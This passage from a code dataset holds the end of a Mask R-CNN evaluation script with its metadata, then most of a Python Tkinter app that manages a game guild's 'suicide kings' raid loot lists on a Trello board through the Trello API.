= 0\n for pred in preds:\n extra_fields = pred.extra_fields\n selected_ids = []\n for idx, score in enumerate(extra_fields['scores']):\n if score > limit and extra_fields['labels'][idx] in range(1, 6):\n selected_ids.append(idx)\n\n extra_fields['scores'] = extra_fields['scores'][selected_ids]\n extra_fields['labels'] = extra_fields['labels'][selected_ids]\n cnt1 = cnt1 + pred.bbox.size(0)\n pred.bbox = pred.bbox[selected_ids]\n cnt2 = cnt2 + pred.bbox.size(0)\n\n print('bbox: ', cnt1, 'to', cnt2)\n return preds\n\n\ndef main():\n preds_filter(preds, 0.05)\n\n do_coco_evaluation(\n dataset=data_loaders_val[0].dataset,\n 
predictions=preds,\n output_folder=output_folders[0],\n **extra_args\n )\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "tools/tianchi_xray/eval.py", "file_name": "eval.py", "file_ext": "py", "file_size_in_byte": 3836, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "os.path.dirname", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 5, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 6, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 7, "usage_type": "attribute"}, {"api_name": "sys.path.insert", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 22, "usage_type": "call"}, {"api_name": "argparse.REMAINDER", "line_number": 35, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg.merge_from_file", "line_number": 40, "usage_type": "call"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 40, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.config.cfg.merge_from_list", "line_number": 41, "usage_type": "call"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 41, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.config.cfg.freeze", "line_number": 42, "usage_type": "call"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 42, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.data.make_data_loader", "line_number": 44, "usage_type": "call"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 44, "usage_type": "argument"}, {"api_name": "maskrcnn_benchmark.config.cfg.DATASETS", "line_number": 46, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 46, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.config.cfg.DATASETS", "line_number": 47, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 47, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.config.cfg.OUTPUT_DIR", "line_number": 48, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 48, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg.OUTPUT_DIR", "line_number": 50, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 50, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.utils.miscellaneous.mkdir", "line_number": 51, "usage_type": "call"}, {"api_name": "maskrcnn_benchmark.config.cfg.TEST", "line_number": 57, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 57, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.config.cfg.TEST", "line_number": 58, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 58, "usage_type": "name"}, {"api_name": "torch.load", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 61, "usage_type": "call"}, {"api_name": "os.path", "line_number": 61, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg.OUTPUT_DIR", 
"line_number": 61, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.config.cfg", "line_number": 61, "usage_type": "name"}, {"api_name": "maskrcnn_benchmark.data.datasets.evaluation.coco.coco_eval.prepare_for_coco_detection", "line_number": 77, "usage_type": "call"}, {"api_name": "maskrcnn_benchmark.data.datasets.evaluation.coco.coco_eval.COCOResults", "line_number": 79, "usage_type": "call"}, {"api_name": "tempfile.NamedTemporaryFile", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "maskrcnn_benchmark.data.datasets.evaluation.coco.coco_eval.evaluate_predictions_on_coco", "line_number": 86, "usage_type": "call"}, {"api_name": "maskrcnn_benchmark.data.datasets.evaluation.coco.coco_eval.check_expected_results", "line_number": 91, "usage_type": "call"}]}
+{"seq_id": "260035411", "text": "#!/usr/bin/env python3\r\n\r\nimport configparser\r\nimport logging\r\nimport os\r\nimport requests\r\nfrom tkinter import *\r\n\r\n\r\n###############################################################################\r\n# Parse configuration file\r\nfn = os.path.join(os.path.dirname(__file__), \"config.txt\")\r\nconfig = configparser.ConfigParser()\r\nconfig.read(fn)\r\n\r\n# Set json for key and token to be used with query params\r\nauth = {\"key\": config[\"auth\"][\"key\"],\r\n \"token\": config[\"auth\"][\"secret\"]}\r\n\r\n# Define logging\r\nformatter = logging.Formatter(\"%(asctime)s - %(levelname)s - %(message)s\")\r\nevent_log = logging.getLogger(\"events\")\r\nevent_log.setLevel(logging.INFO)\r\nfh = logging.FileHandler(\"events.log\")\r\nfh.setLevel(logging.INFO)\r\nfh.setFormatter(formatter)\r\nch = logging.StreamHandler()\r\nch.setLevel(logging.INFO)\r\nch.setFormatter(formatter)\r\nevent_log.addHandler(fh)\r\nevent_log.addHandler(ch)\r\n\r\n\r\n###############################################################################\r\n# Trello API Class\r\nclass Trello:\r\n def __init__(self, method, request, params, payload):\r\n self.base_url = \"https://api.trello.com\"\r\n self.headers = {\"Content-Type\": \"application/json\",\r\n \"accept\": \"application/json\"}\r\n self.method = method\r\n self.request = request\r\n self.params = params\r\n self.payload = payload\r\n\r\n # Sends request and returns the response\r\n def get_response(self):\r\n url = f\"{self.base_url}{self.request}\"\r\n resp = requests.request(self.method,\r\n url,\r\n headers=self.headers,\r\n params=self.params,\r\n json=self.payload)\r\n if resp.status_code is not 200:\r\n print(f\"API request failed with status: {resp.status_code}\")\r\n return resp.content\r\n return resp.json()\r\n\r\n\r\n###############################################################################\r\n# Trello Data Parse Class\r\nclass Trello_Data:\r\n def __init__(self):\r\n self.all_lists = Trello(\"GET\",\r\n f\"/1/boards/{config['trello']['board_id']}\"\r\n f\"/lists\",\r\n auth,\r\n None).get_response()\r\n self.all_cards = self.batch_get_cards()\r\n for list in self.all_lists:\r\n try:\r\n if list[\"name\"] == config[\"trello\"][\"main_master\"]:\r\n self.main_master_id = list[\"id\"]\r\n continue\r\n elif list[\"name\"] == config[\"trello\"][\"tier_master\"]:\r\n self.tier_master_id = list[\"id\"]\r\n continue\r\n elif list[\"name\"] == config[\"trello\"][\"main_pull\"]:\r\n self.main_pull_id = list[\"id\"]\r\n continue\r\n elif list[\"name\"] == config[\"trello\"][\"tier_pull\"]:\r\n self.tier_pull_id = list[\"id\"]\r\n continue\r\n elif list[\"name\"] == config[\"trello\"][\"main_live\"]:\r\n self.main_live_id = list[\"id\"]\r\n continue\r\n elif list[\"name\"] == config[\"trello\"][\"tier_live\"]:\r\n self.tier_live_id = list[\"id\"]\r\n except IndexError:\r\n continue\r\n except AttributeError:\r\n pass\r\n except TypeError as e:\r\n print(e)\r\n for response in self.all_cards:\r\n try:\r\n if response[\"200\"][0][\"idList\"] == self.main_master_id:\r\n self.main_master_cards = response[\"200\"]\r\n continue\r\n elif response[\"200\"][0][\"idList\"] == self.tier_master_id:\r\n self.tier_master_cards = response[\"200\"]\r\n continue\r\n elif response[\"200\"][0][\"idList\"] == self.main_pull_id:\r\n self.main_pull_cards = response[\"200\"]\r\n continue\r\n elif response[\"200\"][0][\"idList\"] == self.tier_pull_id:\r\n self.tier_pull_cards = response[\"200\"]\r\n continue\r\n elif 
response[\"200\"][0][\"idList\"] == self.main_live_id:\r\n self.main_live_cards = response[\"200\"]\r\n continue\r\n elif response[\"200\"][0][\"idList\"] == self.tier_live_id:\r\n self.tier_live_cards = response[\"200\"]\r\n except IndexError:\r\n continue\r\n except AttributeError:\r\n pass\r\n except TypeError as e:\r\n print(e)\r\n self.members = sorted(self.main_master_cards,\r\n key=lambda i: (i['name']))\r\n\r\n def batch_get_cards(self):\r\n batch_urls = []\r\n for list in self.all_lists:\r\n batch_urls.append(f\"/lists/{list['id']}/cards\")\r\n batch_params = auth\r\n batch_params[\"urls\"] = batch_urls\r\n try:\r\n batch_response = Trello(\"GET\",\r\n f\"/1/batch\",\r\n batch_params,\r\n None).get_response()\r\n except Exception as e:\r\n print(e)\r\n del batch_params[\"urls\"]\r\n return batch_response\r\n\r\n\r\n###############################################################################\r\n# Collect and organize the initial Trello data\r\ncurrent_data = Trello_Data()\r\nsk_tracker = []\r\n\r\n\r\n###############################################################################\r\n# Buttons / Functions\r\ndef class_color(card):\r\n if card[\"labels\"][0][\"name\"] == \"Warrior\":\r\n color = config[\"colors\"][\"warrior\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Druid\":\r\n color = config[\"colors\"][\"druid\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Hunter\":\r\n color = config[\"colors\"][\"hunter\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Mage\":\r\n color = config[\"colors\"][\"mage\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Paladin\":\r\n color = config[\"colors\"][\"paladin\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Priest\":\r\n color = config[\"colors\"][\"priest\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Rogue\":\r\n color = config[\"colors\"][\"rogue\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Shaman\":\r\n color = config[\"colors\"][\"shaman\"]\r\n elif card[\"labels\"][0][\"name\"] == \"Warlock\":\r\n color = config[\"colors\"][\"warlock\"]\r\n return color\r\n\r\n\r\ndef refresh_tklists():\r\n print(\"Refreshing lists...\")\r\n global_list.delete(0, \"end\")\r\n main_list.delete(0, \"end\")\r\n tier_list.delete(0, \"end\")\r\n active_filters = []\r\n for key, value in filters.items():\r\n if value.get() == 1:\r\n active_filters.append(key)\r\n if len(active_filters) == 0:\r\n active_filters = [\"druid\", \"hunter\", \"mage\", \"paladin\",\r\n \"priest\", \"rogue\", \"shaman\",\r\n \"warlock\", \"warrior\"]\r\n main_count = 0\r\n tier_count = 0\r\n for card in current_data.members:\r\n global_list.insert(\"end\",\r\n f\"{card['name']} - ({card['labels'][0]['name']})\")\r\n global_list.itemconfig(\"end\", {\"fg\": config[\"colors\"][\"text\"],\r\n \"bg\": class_color(card)})\r\n try:\r\n for card in current_data.main_live_cards:\r\n if card[\"labels\"][0][\"name\"].lower() in active_filters:\r\n main_list.insert(\"end\",\r\n f\"{card['name']} - \"\r\n f\"({card['labels'][0]['name']})\")\r\n main_list.itemconfig(\"end\", {\"fg\": config[\"colors\"][\"text\"],\r\n \"bg\": class_color(card)})\r\n main_count += 1\r\n for card in current_data.tier_live_cards:\r\n if card[\"labels\"][0][\"name\"].lower() in active_filters:\r\n tier_list.insert(\"end\",\r\n f\"{card['name']} - \"\r\n f\"({card['labels'][0]['name']})\")\r\n tier_list.itemconfig(\"end\", {\"fg\": config[\"colors\"][\"text\"],\r\n \"bg\": class_color(card)})\r\n tier_count += 1\r\n except AttributeError:\r\n pass\r\n if main_count != tier_count:\r\n print(\"WARNING: Asymmetrical 
counts between main and tier lists.\")\r\n main_count_label.config(fg=\"red\")\r\n tier_count_label.config(fg=\"red\")\r\n main_count_label.config(text=(f\"{config['trello']['main_live']}: \"\r\n f\"{main_count}\"))\r\n tier_count_label.config(text=(f\"{config['trello']['tier_live']}: \"\r\n f\"{tier_count}\"))\r\n print(\"Done refreshing.\")\r\n return True\r\n\r\n\r\ndef check_lists():\r\n try:\r\n if (current_data.main_live_id and\r\n current_data.main_pull_id and\r\n current_data.tier_live_id and\r\n current_data.tier_pull_id):\r\n return True\r\n except AttributeError:\r\n return False\r\n\r\n\r\ndef create_lists():\r\n global current_data\r\n current_data = Trello_Data()\r\n qparams = auth\r\n if check_lists():\r\n log_list.insert(\"end\",\r\n \"Already exists: pull/live.\")\r\n return False\r\n qparams[\"idBoard\"] = config['trello']['board_id']\r\n qparams[\"name\"] = config[\"trello\"][\"main_pull\"]\r\n qparams[\"idListSource\"] = current_data.main_master_id\r\n qparams[\"pos\"] = \"bottom\"\r\n print(\"Creating main pull list...\")\r\n resp1 = Trello(\"POST\",\r\n \"/1/lists\",\r\n qparams,\r\n None).get_response()\r\n qparams[\"name\"] = config[\"trello\"][\"tier_pull\"]\r\n qparams[\"idListSource\"] = current_data.tier_master_id\r\n qparams[\"pos\"] = \"bottom\"\r\n print(\"Creating tier pull list...\")\r\n resp2 = Trello(\"POST\",\r\n \"/1/lists\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"idListSource\"]\r\n qparams[\"name\"] = config[\"trello\"][\"main_live\"]\r\n qparams[\"pos\"] = \"bottom\"\r\n print(\"Creating main live list...\")\r\n resp3 = Trello(\"POST\",\r\n \"/1/lists\",\r\n qparams,\r\n None).get_response()\r\n qparams[\"name\"] = config[\"trello\"][\"tier_live\"]\r\n qparams[\"pos\"] = \"bottom\"\r\n print(\"Creating tier live list...\")\r\n resp4 = Trello(\"POST\",\r\n \"/1/lists\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"idBoard\"], qparams[\"name\"], qparams[\"pos\"]\r\n current_data = Trello_Data()\r\n refresh_tklists()\r\n print(\"Created: pull/live\")\r\n event_log.info(\"Created: pull/live\")\r\n log_list.insert(\"end\",\r\n \"Created: pull/live\")\r\n return True\r\n\r\n\r\ndef add_to_raid():\r\n global current_data\r\n current_data = Trello_Data()\r\n if not check_lists():\r\n log_list.insert(\"end\",\r\n \"Missing: pull/live\")\r\n return False\r\n qparams = auth\r\n for name in chosen_player(\"Extended\"):\r\n print(f\"Adding {name} to live lists...\")\r\n try:\r\n for card in current_data.main_pull_cards:\r\n if card[\"name\"] == name:\r\n main_card_id = card[\"id\"]\r\n main_pos = card[\"pos\"]\r\n break\r\n for card in current_data.tier_pull_cards:\r\n if card[\"name\"] == name:\r\n tier_card_id = card[\"id\"]\r\n tier_pos = card[\"pos\"]\r\n break\r\n if main_card_id and tier_card_id:\r\n qparams[\"idList\"] = current_data.main_live_id\r\n qparams[\"idCardSource\"] = main_card_id\r\n qparams[\"pos\"] = main_pos\r\n resp1 = Trello(\"POST\",\r\n \"/1/cards\",\r\n qparams,\r\n None).get_response()\r\n qparams[\"idList\"] = current_data.tier_live_id\r\n qparams[\"idCardSource\"] = tier_card_id\r\n qparams[\"pos\"] = tier_pos\r\n resp2 = Trello(\"POST\",\r\n \"/1/cards\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"idList\"], qparams[\"idCardSource\"], qparams[\"pos\"]\r\n qparams[\"name\"] = \"-\"\r\n resp3 = Trello(\"PUT\",\r\n f\"/1/cards/{main_card_id}\",\r\n qparams,\r\n None).get_response()\r\n resp4 = Trello(\"PUT\",\r\n f\"/1/cards/{tier_card_id}\",\r\n qparams,\r\n None).get_response()\r\n del 
qparams[\"name\"], main_card_id, tier_card_id\r\n print(f\"Added: {name}\")\r\n event_log.info(f\"Added: {name}\")\r\n log_list.insert(\"end\",\r\n f\"Added: {name}\")\r\n except NameError:\r\n print(f\"Unable to add {name}. May have already been added.\")\r\n log_list.insert(\"end\",\r\n f\"Unable to add: {name}\")\r\n continue\r\n current_data = Trello_Data()\r\n refresh_tklists()\r\n return True\r\n\r\n\r\ndef remove_from_raid():\r\n global current_data\r\n current_data = Trello_Data()\r\n if not check_lists():\r\n log_list.insert(\"end\",\r\n \"Missing: pull/live\")\r\n return False\r\n qparams = auth\r\n for name in chosen_player(\"Extended\"):\r\n print(f\"Removing {name} from live lists...\")\r\n main_count = 0\r\n tier_count = 0\r\n main_pull_count = 0\r\n tier_pull_count = 0\r\n try:\r\n for card in current_data.main_live_cards:\r\n main_count += 1\r\n if card[\"name\"] == name:\r\n main_live_card_id = card[\"id\"]\r\n break\r\n for card in current_data.tier_live_cards:\r\n tier_count += 1\r\n if card[\"name\"] == name:\r\n tier_live_card_id = card[\"id\"]\r\n break\r\n for card in current_data.main_pull_cards:\r\n if card[\"name\"] == \"-\":\r\n main_pull_count += 1\r\n if main_pull_count == main_count:\r\n main_pull_card_id = card[\"id\"]\r\n main_pull_pos = card[\"pos\"]\r\n break\r\n for card in current_data.tier_pull_cards:\r\n if card[\"name\"] == \"-\":\r\n tier_pull_count += 1\r\n if tier_pull_count == tier_count:\r\n tier_pull_card_id = card[\"id\"]\r\n tier_pull_pos = card[\"pos\"]\r\n break\r\n if main_live_card_id and tier_live_card_id:\r\n qparams[\"idList\"] = current_data.main_pull_id\r\n qparams[\"pos\"] = main_pull_pos\r\n resp1 = Trello(\"PUT\",\r\n f\"/1/cards/{main_live_card_id}\",\r\n qparams,\r\n None).get_response()\r\n qparams[\"idList\"] = current_data.tier_pull_id\r\n qparams[\"pos\"] = tier_pull_pos\r\n resp2 = Trello(\"PUT\",\r\n f\"/1/cards/{tier_live_card_id}\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"idList\"], qparams[\"pos\"]\r\n resp3 = Trello(\"DELETE\",\r\n f\"/1/cards/{main_pull_card_id}\",\r\n qparams,\r\n None).get_response()\r\n resp4 = Trello(\"DELETE\",\r\n f\"/1/cards/{tier_pull_card_id}\",\r\n qparams,\r\n None).get_response()\r\n del main_live_card_id, tier_live_card_id\r\n print(f\"Removed: {name}\")\r\n event_log.info(f\"Removed: {name}\")\r\n log_list.insert(\"end\",\r\n f\"Removed: {name}\")\r\n except NameError:\r\n print(f\"Unable to remove {name}. 
May have already been removed.\")\r\n log_list.insert(\"end\",\r\n f\"Unable to remove {name}.\")\r\n continue\r\n current_data = Trello_Data()\r\n refresh_tklists()\r\n return True\r\n\r\n\r\ndef mainsk():\r\n global current_data\r\n if chosen_player(\"Single\") is not False:\r\n suicide(chosen_player(\"Single\"), \"Main\")\r\n else:\r\n return False\r\n current_data = Trello_Data()\r\n refresh_tklists()\r\n return True\r\n\r\n\r\ndef tiersk():\r\n global current_data\r\n if chosen_player(\"Single\") is not False:\r\n suicide(chosen_player(\"Single\"), \"Tier\")\r\n else:\r\n return False\r\n current_data = Trello_Data()\r\n refresh_tklists()\r\n return True\r\n\r\n\r\ndef chosen_player(limit_type):\r\n if limit_type == \"Single\":\r\n if len(global_list.curselection()) == 1:\r\n slist = global_list\r\n selection = global_list.curselection()\r\n elif len(main_list.curselection()) == 1:\r\n slist = main_list\r\n selection = main_list.curselection()\r\n elif len(tier_list.curselection()) == 1:\r\n slist = tier_list\r\n selection = tier_list.curselection()\r\n else:\r\n log_list.insert(\"end\",\r\n \"Requires 1 selection.\")\r\n return False\r\n name = slist.get(selection)[:slist.get(selection).index(\" \")]\r\n return name\r\n elif limit_type == \"Extended\":\r\n names = []\r\n if len(global_list.curselection()) > 0:\r\n slist = global_list\r\n selection = global_list.curselection()\r\n elif len(main_list.curselection()) > 0:\r\n slist = main_list\r\n selection = main_list.curselection()\r\n elif len(tier_list.curselection()) > 0:\r\n slist = tier_list\r\n selection = tier_list.curselection()\r\n try:\r\n if selection:\r\n for label in selection:\r\n names.append(slist.get(label)\r\n [:slist.get(label).index(\" \")])\r\n return names\r\n except UnboundLocalError:\r\n log_list.insert(\"end\",\r\n \"No player selected.\")\r\n return False\r\n\r\n\r\ndef suicide(name, sklist):\r\n if not check_lists():\r\n log_list.insert(\"end\",\r\n \"Missing: pull/live\")\r\n return False\r\n qparams = auth\r\n if sklist == \"Main\":\r\n for card in current_data.main_live_cards:\r\n if card[\"name\"] == name:\r\n sk_data = {}\r\n sk_data[\"name\"] = name\r\n sk_data[\"main_id\"] = card[\"id\"]\r\n sk_data[\"main_pos\"] = card[\"pos\"]\r\n qparams[\"pos\"] = \"bottom\"\r\n resp1 = Trello(\"PUT\",\r\n f\"/1/cards/{sk_data['main_id']}\",\r\n qparams,\r\n None).get_response()\r\n break\r\n for card in current_data.tier_live_cards:\r\n if card[\"name\"] == name:\r\n sk_data[\"tier_id\"] = card[\"id\"]\r\n sk_data[\"tier_pos\"] = card[\"pos\"]\r\n break\r\n try:\r\n del qparams[\"pos\"]\r\n except KeyError:\r\n print(f\"{name} not on live lists.\")\r\n log_list.insert(\"end\",\r\n f\"{name} not on live lists.\")\r\n return False\r\n sk_tracker.append(sk_data)\r\n event_log.info(f\"Main SK: {name}\")\r\n print(f\"Main SK: {name}\")\r\n log_list.insert(\"end\",\r\n f\"Main SK: {name}\")\r\n return True\r\n if sklist == \"Tier\":\r\n for card in current_data.main_live_cards:\r\n if card[\"name\"] == name:\r\n sk_data = {}\r\n sk_data[\"name\"] = name\r\n sk_data[\"main_id\"] = card[\"id\"]\r\n sk_data[\"main_pos\"] = card[\"pos\"]\r\n break\r\n for card in current_data.tier_live_cards:\r\n if card[\"name\"] == name:\r\n sk_data[\"tier_id\"] = card[\"id\"]\r\n sk_data[\"tier_pos\"] = card[\"pos\"]\r\n qparams[\"pos\"] = \"bottom\"\r\n resp1 = Trello(\"PUT\",\r\n f\"/1/cards/{sk_data['tier_id']}\",\r\n qparams,\r\n None).get_response()\r\n break\r\n del qparams[\"pos\"]\r\n sk_tracker.append(sk_data)\r\n 
event_log.info(f\"Tier SK: {name}\")\r\n print(f\"Tier SK: {name}\")\r\n log_list.insert(\"end\",\r\n f\"Tier SK: {name}\")\r\n return True\r\n\r\n\r\ndef undosk():\r\n if len(sk_tracker) == 0:\r\n log_list.insert(\"end\",\r\n \"No SK to undo.\")\r\n return False\r\n global current_data\r\n qparams = auth\r\n qparams[\"pos\"] = sk_tracker[-1][\"main_pos\"]\r\n print(f\"Undo SK: {sk_tracker[-1]}\")\r\n resp1 = Trello(\"PUT\",\r\n f\"/1/cards/{sk_tracker[-1]['main_id']}\",\r\n qparams,\r\n None).get_response()\r\n qparams[\"pos\"] = sk_tracker[-1][\"tier_pos\"]\r\n resp2 = Trello(\"PUT\",\r\n f\"/1/cards/{sk_tracker[-1]['tier_id']}\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"pos\"]\r\n event_log.info(f\"SK undone: {sk_tracker[-1]['name']}\")\r\n print(f\"SK undone: {sk_tracker[-1]['name']}\")\r\n log_list.insert(\"end\",\r\n f\"SK undone: {sk_tracker[-1]['name']}\")\r\n sk_tracker.pop(-1)\r\n current_data = Trello_Data()\r\n refresh_tklists()\r\n return True\r\n\r\n\r\ndef merge_lists():\r\n global current_data\r\n if not check_lists():\r\n log_list.insert(\"end\",\r\n \"Missing: pull/live\")\r\n return False\r\n print(\"Merging Live lists into Pull lists...\\n\"\r\n \"This can take a while...\")\r\n qparams = auth\r\n try:\r\n i = 0\r\n while len(current_data.main_live_cards) > 0:\r\n if current_data.main_pull_cards[i][\"name\"] == \"-\":\r\n main_live_card_id = current_data.main_live_cards[0][\"id\"]\r\n main_pull_card_id = current_data.main_pull_cards[i][\"id\"]\r\n qparams[\"idList\"] = current_data.main_pull_id\r\n qparams[\"pos\"] = current_data.main_pull_cards[i][\"pos\"]\r\n print(\"Main merging \"\r\n f\"{current_data.main_live_cards[0]['name']}\")\r\n resp1 = Trello(\"PUT\",\r\n f\"/1/cards/{main_live_card_id}\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"idList\"], qparams[\"pos\"]\r\n resp2 = Trello(\"DELETE\",\r\n f\"/1/cards/{main_pull_card_id}\",\r\n qparams,\r\n None).get_response()\r\n current_data = Trello_Data()\r\n i += 1\r\n except AttributeError as e:\r\n pass\r\n try:\r\n i = 0\r\n while len(current_data.tier_live_cards) > 0:\r\n if current_data.tier_pull_cards[i][\"name\"] == \"-\":\r\n tier_live_card_id = current_data.tier_live_cards[0][\"id\"]\r\n tier_pull_card_id = current_data.tier_pull_cards[i][\"id\"]\r\n qparams[\"idList\"] = current_data.tier_pull_id\r\n qparams[\"pos\"] = current_data.tier_pull_cards[i][\"pos\"]\r\n print(\"Tier merging \"\r\n f\"{current_data.tier_live_cards[0]['name']}\")\r\n resp3 = Trello(\"PUT\",\r\n f\"/1/cards/{tier_live_card_id}\",\r\n qparams,\r\n None).get_response()\r\n del qparams[\"idList\"], qparams[\"pos\"]\r\n resp4 = Trello(\"DELETE\",\r\n f\"/1/cards/{tier_pull_card_id}\",\r\n qparams,\r\n None).get_response()\r\n current_data = Trello_Data()\r\n i += 1\r\n except AttributeError as e:\r\n pass\r\n qparams[\"value\"] = 1\r\n try:\r\n resp5 = Trello(\"PUT\",\r\n f\"/1/lists/{current_data.main_live_id}/closed\",\r\n qparams,\r\n None).get_response()\r\n except AttributeError:\r\n pass\r\n try:\r\n resp6 = Trello(\"PUT\",\r\n f\"/1/lists/{current_data.tier_live_id}/closed\",\r\n qparams,\r\n None).get_response()\r\n except AttributeError:\r\n pass\r\n del qparams[\"value\"]\r\n print(\"Merged: live lists\")\r\n event_log.info(\"Merged: live lists\")\r\n log_list.insert(\"end\",\r\n \"Merged: live lists\")\r\n refresh_tklists()\r\n return True\r\n\r\n\r\n###############################################################################\r\n# Configure tkinter window\r\nwindow = 
Tk()\r\nwindow.geometry(\"680x1000\")\r\nwindow.config(bg=\"#202533\")\r\nwindow.title(\"Whiteclaw Clan Loot Master\")\r\ncanvas = Canvas(window, bg=\"#202533\", width=100, height=100)\r\nimg = PhotoImage(file=\"logo100x100.gif\")\r\ncanvas.create_image(50, 50, anchor=\"center\", image=img)\r\n\r\n# Global Frame\r\nglobal_label = Label(window, bg=\"#202533\", fg=\"#ffffff\",\r\n text=\"Global List | Log | Controls\")\r\nglobal_frame = Frame(window, bg=\"#202533\", borderwidth=5,\r\n relief=\"sunken\")\r\nglobal_list = Listbox(global_frame, bg=\"#202533\", fg=\"#ffffff\",\r\n font=(\"Helvetica\", 12),\r\n height=20, width=25, selectmode=\"extended\",\r\n highlightcolor=\"#D94A66\",\r\n highlightthickness=\"3\",\r\n selectbackground=\"#D94A66\")\r\ngl_scrollbar = Scrollbar(global_frame, orient=\"vertical\")\r\ngl_scrollbar.config(command=global_list.yview, bg=\"#2c3b47\")\r\nglobal_list.config(yscrollcommand=gl_scrollbar.set)\r\nlog_list = Listbox(global_frame, bg=\"#202533\", fg=\"#ffffff\",\r\n font=(\"Helvetica\", 12), height=20, width=25,\r\n highlightcolor=\"#D94A66\",\r\n highlightthickness=\"3\",\r\n selectbackground=\"#D94A66\")\r\nll_scrollbar = Scrollbar(global_frame, orient=\"vertical\")\r\nll_scrollbar.config(command=log_list.yview, bg=\"#2c3b47\")\r\nlog_list.config(yscrollcommand=ll_scrollbar.set)\r\n\r\n# Live Lists Frame\r\nlocal_label = Label(window, bg=\"#202533\", fg=\"#ffffff\",\r\n text=(f\"{config['trello']['main_live']} | \"\r\n f\"{config['trello']['tier_live']} | Filters\"))\r\nmain_frame = Frame(window, bg=\"#202533\", borderwidth=5, relief=\"raised\")\r\nmain_list = Listbox(main_frame, bg=\"#202533\", fg=\"#ffffff\",\r\n font=(\"Helvetica\", 12), height=20, width=25,\r\n highlightcolor=\"#D94A66\",\r\n highlightthickness=\"3\",\r\n selectbackground=\"#D94A66\")\r\nml_scrollbar = Scrollbar(main_frame, orient=\"vertical\")\r\nml_scrollbar.config(command=main_list.yview, bg=\"#2c3b47\")\r\nmain_list.config(yscrollcommand=ml_scrollbar.set)\r\ntier_list = Listbox(main_frame, bg=\"#202533\", fg=\"#ffffff\",\r\n font=(\"Helvetica\", 12), height=20, width=25,\r\n highlightcolor=\"#D94A66\",\r\n highlightthickness=\"3\",\r\n selectbackground=\"#D94A66\")\r\ntl_scrollbar = Scrollbar(main_frame, orient=\"vertical\")\r\ntl_scrollbar.config(command=main_list.yview, bg=\"#2c3b47\")\r\ntier_list.config(yscrollcommand=tl_scrollbar.set)\r\ncreate_pl_button = Button(global_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=create_lists,\r\n text=\"Create pull/live lists\", width=25)\r\nadd_button = Button(global_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=add_to_raid,\r\n text=\"Add player\", width=25)\r\nremove_button = Button(global_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=remove_from_raid,\r\n text=\"Remove player\", width=25)\r\nmainsk_button = Button(global_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=mainsk,\r\n text=\"Main SK\", width=25)\r\ntiersk_button = Button(global_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=tiersk,\r\n text=\"Tier SK\", width=25)\r\nundo_button = Button(global_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=undosk,\r\n text=\"Undo SK\", width=25)\r\nmerge_button = Button(global_frame, bg=\"#2c3b47\", fg=\"#ffffff\",\r\n command=merge_lists,\r\n text=\"Merge lists\", width=25)\r\nfilters = {\"druid\": IntVar(), \"hunter\": IntVar(), \"mage\": IntVar(),\r\n \"paladin\": IntVar(), \"priest\": IntVar(), \"rogue\": IntVar(),\r\n \"shaman\": IntVar(), \"warlock\": IntVar(), \"warrior\": IntVar()}\r\ndruid_filter = 
